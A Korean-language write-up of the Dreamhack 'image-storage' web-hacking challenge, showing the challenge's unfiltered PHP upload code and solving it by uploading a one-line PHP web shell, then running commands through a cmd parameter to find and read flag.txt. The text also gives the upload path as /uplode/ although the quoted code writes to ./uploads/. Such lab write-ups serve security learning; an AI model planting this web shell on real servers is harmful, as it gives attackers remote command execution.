[웹해킹] image-storage

📖 문제

https://dreamhack.io/wargame/challenges/38/

---

📖 분석

해당 문제는 파일 업로드 취약점을 사용해 플래그를 획득하는 문제이다.
주요 코드를 살펴보면

📘 list.php

    <?php
        $directory = './uploads/';
        $scanned_directory = array_diff(scandir($directory), array('..', '.', 'index.html'));
        foreach ($scanned_directory as $key => $value) {
            echo "<li><a href='{$directory}{$value}'>".$value."</a></li><br/>";
        }
    ?> 

$directory에 있는 파일 목록 중 '..', '.', 'index.html'을 제외하고 출력한다.

📘 uplode.php

<?php
  if ($_SERVER['REQUEST_METHOD'] === 'POST') {
    if (isset($_FILES)) {
      $directory = './uploads/';
      $file = $_FILES["file"];
      $error = $file["error"];
      $name = $file["name"];
      $tmp_name = $file["tmp_name"];
     
      if ( $error > 0 ) {
        echo "Error: " . $error . "<br>";
      }else {
        if (file_exists($directory . $name)) {
          echo $name . " already exists. ";
        }else {
          if(move_uploaded_file($tmp_name, $directory . $name)){
            echo "Stored in: " . $directory . $name;
          }
        }
      }
    }else {
        echo "Error !";
    }
    die();
  }
?>

파일 업로드에 대한 전반적인 부분을 담당하는 코드이며, 오류가 났을 때는 error, 같은 이름의 파일이 존재할 떄는 already exists., 그리고 위의 두 경우가 아닐 경우에는 파일 업로드가 가능하다.

다만, 파일 업로드는 어떤 필터링 없이 모든 파일을 업로드할 수 있도록 짜여져 있다.

---

📖 풀이

딱히 파일에 대한 필터링이 없기 때문에 웹 쉘을 사용해 바로 진입할 수 있다.
webshell.php라는 파일을 만들어 아래와 같이 코드를 작성한다.

<?php
    system($_GET[cmd]);
?>

이 파일을 사이트에 업로드 하면 명령어를 사용해 플래그에 접근이 가능하다.
/list 페이지에 가보면 우리가 업로드한 파일이 있다.

이 파일을 클릭하면 해당 페이지로 이동할 수 있다.
간단히 이동하고 싶으면 /uplode 디렉터리에 해당 파일이 있는 것을 코드를 통해 확인했으므로 /uplode/webshell.php로 이동할 수 있다.

우리가 업로드한 웹 쉘을 사용하는 방법은 간단하다.
해당 페이지에 ?cmd=<명령어>를 입력하면 된다.

예를 들어 ls명령어를 사용하기 위해서는 ?cmd=ls를 url 뒤에 붙여주면 된다.

다음과 같이 ls 명령어가 정상적으로 작동되었다.
이제 플래그 파일을 찾아보자

4개의 상위 디렉터리를 거치면 flag.txt가 있는 것이 보인다.
cat 명령어를 통해 플래그를 알아낼 수 있다.